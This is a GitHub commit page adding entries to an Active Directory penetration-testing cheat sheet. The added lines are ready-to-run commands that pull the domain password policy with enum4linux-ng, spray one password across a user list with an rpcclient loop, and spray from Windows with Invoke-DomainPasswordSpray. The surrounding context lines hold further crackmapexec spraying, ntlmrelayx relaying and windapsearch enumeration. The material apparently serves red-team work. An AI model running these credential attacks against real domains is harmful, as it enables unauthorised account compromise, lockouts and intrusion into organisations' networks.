Skip to content

Commit

Permalink
various additions
Browse files Browse the repository at this point in the history
added getting password policy, password spraying using rpcclient, DomainPasswordSpray for windows hosts
  • Loading branch information
servomekanism authored Mar 23, 2023
1 parent 8ce750c commit 10c68ed
Showing 1 changed file with 17 additions and 0 deletions.
17 changes: 17 additions & 0 deletions ad/Readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -230,6 +230,12 @@ python windapsearch -d [domain name] --dc-ip [dc-ip] -u "domain\\username" -p "p
python windapsearch -d [domain name] --dc-ip [dc-ip] -u "domain\\username" -p "password" --unconstrained-computers | tee unconstrained-computers-enumeration
```

#### Get password policy

```
python3 enum4linux-ng.py -P [dc-ip] -oA /tmp/wtf
```

---

#### Find smb not signed
Expand Down Expand Up @@ -300,6 +306,10 @@ python ntlmrelayx.py -6 -wh [domain name] -tf mytargets.txt -smb2support --http

#### Password spraying

```
for i in $(cat valid-users.txt);do rpcclient -U "$i%PASSWORDTOSPRAY" -c "getusername;quit" [dc-ip] | grep Authority ;done
```

```
crackmapexec smb [dc-ip] --pass-pol -u '' -p ''
```
Expand Down Expand Up @@ -330,6 +340,13 @@ crackmapexec smb [ip-range] -u usernames.txt -p passwords.txt --no-bruteforce
crackmapexec smb [ip-range] -H hashes.txt --no-bruteforce
```

##### using windows

```
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
```

---

#### Password bruteforcing
Expand Down

0 comments on commit 10c68ed

Please sign in to comment.